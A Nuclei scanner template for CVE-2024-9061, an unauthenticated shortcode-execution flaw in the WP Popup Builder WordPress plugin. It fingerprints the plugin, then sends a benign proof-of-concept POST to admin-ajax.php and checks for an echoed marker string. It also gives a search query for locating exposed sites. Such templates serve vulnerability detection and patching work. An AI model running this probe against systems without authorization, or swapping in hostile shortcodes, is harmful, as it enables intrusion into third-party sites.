daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2024/CVE-2024-9061.yaml

61 lines
2.2 KiB
YAML
Raw Blame History

id: CVE-2024-9061
info:
name: WP Popup Builder Popup Forms and Marketing Lead Generation <= 1.3.5 - Arbitrary Shortcode Execution
author: s4e-io
severity: high
description: |
The The WP Popup Builder Popup Forms and Marketing Lead Generation plugin for WordPress is vulnerable to arbitrary shortcode execution via the wp_ajax_nopriv_shortcode_Api_Add AJAX action in all versions up to, and including, 1.3.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-9061
- https://www.wordfence.com/threat-intel/vulnerabilities/id/0cac1dc0-87dc-43eb-9db1-638a91200b43?source=cve
- https://github.com/RandomRobbieBF/CVE-2024-9061
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
cvss-score: 7.3
cve-id: CVE-2024-9061
cwe-id: CWE-94
epss-score: 0.00046
epss-percentile: 0.18015
metadata:
max-request: 2
verified: true
vendor: themehunk
product: wp-popup-builder
framework: wordpress
fofa-query: body="/wp-content/plugins/wp-popup-builder/"
tags: cve,cve2024,wp,wordpress,wp-plugin,wp-popup-builder,shortcode
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "/wp-content/plugins/wp-popup-builder")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=shortcode_Api_Add&shortcode=%43%56%45%2d%32%30%32%34%2d%39%30%36%31
matchers:
- type: dsl
dsl:
- 'len(body) == 13'
- 'contains(body, "CVE-2024-9061")'
- 'contains(content_type, "text/html")'
- 'status_code == 200'
condition: and
# digest: 4b0a00483046022100f80fec38e7c5f649695bac35530600b4fbfa1daa9782d746571908c193ec333d022100f9b434ac3748d54c493f2ad2d7bf045e53c97e1abd079858c054b0ce2f03e0e5:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink